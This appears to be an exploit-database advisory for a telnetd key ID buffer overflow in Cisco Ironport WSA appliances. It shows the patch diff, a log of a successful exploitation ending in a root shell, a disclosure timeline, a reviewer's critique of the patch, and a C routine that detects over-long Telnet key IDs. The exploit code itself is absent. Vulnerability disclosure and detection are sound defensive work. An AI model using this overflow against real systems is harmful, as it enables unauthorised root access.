0day.today - Biggest Exploit Database in the World.
Cisco Ironport WSA telnetd Remote Code Execution Vulnerability
Risk: Security Risk High
Cisco Ironport WSA Telnetd Remote Code Execution Vulnerability

Vendor: Cisco
Product web page: http://www.cisco.com
Affected version: Cisco Ironport WSA - AsyncOS 8.0.5 for Web build 075

Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: CVE-2011-4862
CVSS Score: 7.6
Impact: Unauthenticated Remote Code Execution with elevated privileges

Description: The Cisco Ironport WSA virtual appliances are vulnerable to an old FreeBSD telnetd encryption Key ID buffer overflow which allows remote attackers to execute arbitrary code (CVE-2011-4862). Cisco WSA Virtual appliances have the vulnerable telnetd daemon enabled by default.

diff --git a/ChangeLog b/ChangeLog index dd381d1..f4e4457 100644 --- a/ChangeLog +++ b/ChangeLog @@ -1,3 +1,8 @@ +2011-12-25 Alfred M. Szmidt <ams@gnu.org> + + * libtelnet/encrypt.c (encrypt_keyid): Make sure that LEN never is + greater than MAXKEYLEN. + 2011-12-22 Mats Erik Andersson <gnu@gisladisker.se> * libinetutils/setsig.c (setsig) [HAVE_SIGACTION]: Initialize diff --git a/libtelnet/encrypt.c b/libtelnet/encrypt.c index 06827d9..abfa6d4 100644 --- a/libtelnet/encrypt.c +++ b/libtelnet/encrypt.c 
@@ -796,6 +796,9 @@ encrypt_keyid (kp, keyid, len) int dir = kp->dir; register int ret = 0; + if (len > MAXKEYLEN) + len = MAXKEYLEN; + if (!(ep = (*kp->getcrypt) (*kp->modep))) { if (len == 0)

Trying 192.168.0.160...
Connected to 192.168.0.160.
Escape character is '^]'.
[+] Exploiting 192.168.0.160, telnetd rulez!
[+] Target OS - FreeBSD 8.2 amd64
[*] Enjoy your shell
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 10:49:50 PDT 2014 auto-build@vm10bsd0266.eng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64

Disclosure Timeline
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
22-10-2014: Public Disclosure

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862
http://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport

# 0day.today [2024-11-16] #
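
Review bot: In the libtelnet/encrypt.c hunk, "if (len > MAXKEYLEN) len = MAXKEYLEN;" silently truncates an over-long key ID and then goes on to process it as if the peer had sent a valid one. Rejecting the suboption instead (an early return, ideally with a log line) would avoid accepting a malformed key ID in shortened form. The K&R-style signature "encrypt_keyid (kp, keyid, len)" does not show the type of len in this hunk; if it is signed, a negative value passes this check, so either confirm the type or add a lower bound. A short comment naming the buffer that MAXKEYLEN protects would help, and the ChangeLog entry could state that the cap fixes an overflow rather than only that LEN is limited.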
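
A detection-side check for the key ID overflow described in the advisory above, as an added example that is not part of the original advisory, the exploit, or any vendor code: it walks a captured Telnet byte stream and reports the longest ENCRYPT key ID it carries. Command and option numbers follow RFC 854 and RFC 2946; the MAXKEYLEN value of 64, the function names and the sample bytes are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
enum { SE = 240, SB = 250, WILL = 251, DO = 253, DONT = 254, IAC = 255 }; /* RFC 854 */
enum { TELOPT_ENCRYPT = 38, ENC_KEYID = 7, DEC_KEYID = 8 };               /* RFC 2946 */
#define MAXKEYLEN 64 /* assumption: the value libtelnet uses for this bound */

/* Longest key ID (after IAC IAC unescaping) carried by any ENC_KEYID or
 * DEC_KEYID suboption in buf, or -1 if the stream contains none. */
long max_keyid_len(const unsigned char *buf, size_t n)
{
    long best = -1;
    size_t i = 0;
    while (i < n) {
        if (buf[i] != IAC || i + 1 >= n) { i++; continue; }     /* data byte */
        unsigned char cmd = buf[i + 1];
        if (cmd >= WILL && cmd <= DONT) { i += 3; continue; }   /* option negotiation */
        if (cmd != SB) { i += 2; continue; }                    /* IAC IAC, other commands */
        int keyid = i + 3 < n && buf[i + 2] == TELOPT_ENCRYPT &&
                    (buf[i + 3] == ENC_KEYID || buf[i + 3] == DEC_KEYID);
        long len = 0;
        i += keyid ? 4 : 2;
        while (i < n) {                                         /* walk to IAC SE */
            if (buf[i] != IAC) { len++; i++; continue; }
            if (i + 1 < n && buf[i + 1] == IAC) { len++; i += 2; continue; } /* escaped 0xFF */
            i += 2; break;             /* IAC SE, or a stray command, ends it */
        }
        if (keyid && len > best) best = len;
    }
    return best;
}

/* 1 when some key ID is longer than MAXKEYLEN, the bound the patch enforces. */
int keyid_overlong(const unsigned char *buf, size_t n)
{
    return max_keyid_len(buf, n) > MAXKEYLEN;
}

int main(void)
{
    /* Constructed sample: DO ENCRYPT, then a 1-byte key ID. */
    unsigned char ok[] = { IAC, DO, TELOPT_ENCRYPT, IAC, SB, TELOPT_ENCRYPT, ENC_KEYID, 0, IAC, SE };
    /* Constructed sample: a key ID of MAXKEYLEN + 16 filler bytes. */
    unsigned char big[4 + MAXKEYLEN + 16 + 2] = { IAC, SB, TELOPT_ENCRYPT, DEC_KEYID };
    memset(big + 4, 'A', MAXKEYLEN + 16);
    big[sizeof big - 2] = IAC; big[sizeof big - 1] = SE;
    printf("ok:  len=%ld overlong=%d\n", max_keyid_len(ok, sizeof ok), keyid_overlong(ok, sizeof ok));
    printf("big: len=%ld overlong=%d\n", max_keyid_len(big, sizeof big), keyid_overlong(big, sizeof big));
    return 0;
}
```

The scanner works on one direction of a reassembled TCP stream; a key ID split across capture segments is only counted in full once the segments are joined.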